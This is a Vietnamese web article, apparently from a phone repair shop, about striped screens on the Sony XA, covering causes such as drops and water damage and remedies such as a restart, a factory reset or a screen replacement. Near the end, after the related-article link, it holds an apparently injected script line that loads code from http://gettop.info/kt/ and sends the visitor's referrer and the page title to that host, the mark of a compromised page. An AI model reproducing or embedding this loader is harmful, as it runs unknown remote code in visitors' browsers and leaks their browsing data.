Giải pháp xử lý màn hình Sony XA bị sọc hiệu quả

Ngày đăng: 3:07 chiều

Điều gì xảy ra khi màn hình Sony XA bị sọc? Không chỉ mặt thẩm mỹ của máy bị ảnh hưởng mà ngay cả việc sử dụng các tính năng của máy cũng gặp phải nhiều khó khăn.

Màn hình Sony XA bị sọc là một lỗi hư hỏng nghiêm trọng mà những người sở hữu máy có thể gặp phải trong thời gian trải nghiệm. Gọi đây là một lỗi nghiêm trọng bởi sọc màn hình không chỉ khiến nhiều người dùng gặp phải nhiều tình huống khó chịu, mà nó còn rất khó khắc phục, nếu như không có sự trợ giúp của các kĩ thuật viên chuyên nghiệp.

man hinh sony XA bi soc

Sony XA có thể bị sọc màn hình trong thời gian hoạt động

Lý do nào khiến màn hình Sony XA bị sọc?

Nguyên nhân chính khiến Sony XA bị sọc màn hình là do những tác động vật lý hoặc hóa học từ bên ngoài mà máy đã phải chịu trong thời gian hoạt động. Trong đó, thường gặp nhất là hiện tượng Sony XA bị rơi rớt, bị vật cứng va chạm mạnh, bị vật nặng đè nén hoặc bị ngấm nước, tiếp xúc với môi trường độc hại thường xuyên.

Bên cạnh đó, cũng có trường hợp màn hình Sony XA bị sọc do nguyên nhân khách quan của nhà sản xuất hoặc do lỗi phần mềm, khi máy chưa được update phiên bản phần mềm mới nhất hay khi có ứng dụng không tương thích được cài đặt. Tuy nhiên, khả năng xảy ra của 2 trường hợp này không cao.

man hinh sony XA bi soc

Màn hình Sony XA bị sọc thường do lỗi hư hỏng về phần cứng gây ra

Điều bạn cần làm khi Sony XA bị sọc màn hình

– Trước tiên, hãy thử tắt nguồn và khởi động lại Sony XA bằng cách nhấn giữ tổ hợp phím Power và Volume up trong khoảng vài giây, cho đến khi máy rung lên thì bỏ tay ra, máy sẽ tự khởi động lại. Nếu cách này không có tác dụng, bạn cũng có thể thiết lập lại cài đặt gốc cho máy, để giải quyết triệt để những vấn đề xảy ra về phần mềm. Tuy nhiên, nếu như khôi phục cài đặt gốc, bạn cần đảm bảo những dữ liệu có trong thiết bị đã được sao lưu cẩn thận.

– Vỗ nhẹ vào thân máy cũng là một cách khắc phục tạm thời lỗi Sony XA bị sọc màn hình. Nếu may mắn, lỗi sọc màn hình trên chiếc điện thoại của bạn sẽ được khắc phục. Tuy nhiên, cách này chỉ có tác dụng tạm thời chứ không đảm bảo khắc phục lỗi hoàn toàn và triệt để.

man hinh sony XA bi soc

Bạn nên làm những gì khi Sony XA bị sọc màn hình?

– Đối với lỗi màn hình Sony XA bị sọc, cách xử lý tốt nhất dành cho bạn là thay mới màn hình cho máy ở một trung tâm sửa chữa smartphone chuyên nghiệp. Khi cần tới dịch vụ này, bạn nhớ lựa chọn một địa chỉ chất lượng và thật đáng tin cậy nhé!

>> Xem thêm: Sony XA bị đơ màn hình

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Tin liên quan

Thay màn hình Samsung S6 chính hãng
Tháng Hai 28, 2017 leehieu